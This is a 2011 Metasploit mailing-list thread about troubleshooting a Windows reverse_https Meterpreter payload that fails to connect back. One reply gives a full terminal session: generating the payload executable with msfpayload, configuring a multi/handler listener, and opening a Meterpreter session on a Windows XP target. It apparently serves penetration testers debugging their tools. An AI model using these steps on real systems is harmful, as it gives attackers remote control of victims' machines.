Make sure your LPORT is right; by default reverse_https connects to 8443.
I just tested with current svn and it worked.
chris@carnal0wnage:~/trunk$ ./msfpayload windows/meterpreter/reverse_https LHOST
Created by msfpayload (http://www.metasploit.com).
chris@carnal0wnage:~/trunk$ file demohttps.exe
demohttps.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 342 auxiliary
+ -- --=[ 257 payloads - 27 encoders - 8 nops
=[ svn r11870 updated today (2011.03.03)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://y.y.y.y:8443/
[*] Starting the payload handler...
[*] x.x.x.x:23735 Request received for /AyCku...
[*] x.x.x.x:23735 Staging connection for target yCku received...
[*] Patching Target ID yCku into DLL
[*] x.x.x.x:23736 Request received for /ByCku...
[*] x.x.x.x:23736 Stage connection for target yCku received...
[*] Meterpreter session 1 opened (y.y.y.y:8443 -> x.x.x.x:23736) at
Thu Mar 03 16:17:48 +0000 2011
meterpreter > sysinfo
Computer : COMPUTER
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language : en_US
On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos
> I have tried numerous scenarios such as:
> 1. Middle proxy servers (more than 3 different web proxy software)
> 2. A single proxy server
> 3. No proxy server
> 4. Over the internet and locally (get the same error)
> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
> 6. Tested with IE6, unpatched.
> 7. Tested with different user accounts and group policies.
> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as a
> 9. Tested without any AV protection or Firewall-IPS.
> When I run the payload (for example the "exe" file in an unprotected PC - no
> AV, no IPS) I got its name on the task manager just for a while and then
> However, I don't see any instance of iexplorer.exe running.
> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <firstname.lastname@example.org> wrote:
>> On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
>> > And then, the listener stops giving any other info.
>> > I went to the victim PC and realized that the payload exe had already
>> > died.
>> > I couldn't see it on the task manager.
>> > Concurrently, I had been running wireshark.
>> > The two last packets were:
>> > 1. Victim => Listener (RST, ACK)
>> > 2. Listener => Victim (FIN, ACK)
>> > Finally I don't get any connections.
>> > Does anyone know how to fix this?
>> Is there any network proxy/filter between the target and yourself? Is
>> the target running an endpoint protection product or HIPS? Is the target
>> process a user-process (IE) or a system process (assuming IE/user-land)?
>> The reverse_https payload is finicky based on the WinInet profile of the
>> user running the code.